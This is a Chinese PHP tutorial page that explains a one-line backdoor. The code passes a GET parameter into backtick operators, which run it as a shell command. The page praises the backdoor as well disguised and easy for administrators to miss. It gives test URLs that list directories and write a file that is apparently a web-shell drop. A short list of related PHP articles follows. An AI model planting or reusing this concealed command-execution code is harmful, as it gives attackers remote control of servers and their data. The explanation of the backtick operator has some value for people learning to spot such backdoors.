手机
当前位置:查字典教程网 >编程开发 >php教程 >一个不易被发现的PHP后门代码解析
一个不易被发现的PHP后门代码解析
摘要:偶然间看到一段,看起来似乎没有什么问题,确是能致命的后门代码,这里用到了一个一般的PHPer都不怎么关注的反撇号`,反撇号包含的字符串,等同...

偶然间看到一段,看起来似乎没有什么问题,确是能致命的后门代码,这里用到了一个一般的PHPer都不怎么关注的反撇号 ` ,反撇号包含的字符串,等同于shell_exec函数。

伪装性很好,很容易被管理员忽略。

$selfNums = $_GET['r']; if (isset($selfNums)){ echo `$selfNums`; }

刚看到这段代码我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了,

而且又不是单引号,这个就是关键所在了,这个符号是 Esc 下面的一个键(位于感叹号!旁边的),

通过 echo `系统命令`; 可以达到 system(); 一样的效果

如果不信的朋友可以测试

http://127.0.0.1/t.php?r=dir 可以列出目录

http://127.0.0.1/t.php?r=echo 我是马儿 >>D:web90sec.php

我用 appserv 和虚拟主机已经测试成功。

【一个不易被发现的PHP后门代码解析】相关文章:

PHP嵌套输出缓冲代码实例

php中静态类与静态变量用法区别解析

一个简单的PHP入门源程序

PHP输出一个等腰三角形的方法

一个阿拉伯数字转中文数字的函数

一个连接两个不同MYSQL数据库的PHP程序

一个简单的自动发送邮件系统(二)

php中PDO方式实现数据库的增删改查

一个程序下载的管理程序(三)

Windows下的PHP5.0安装配制详解

精品推荐
分类导航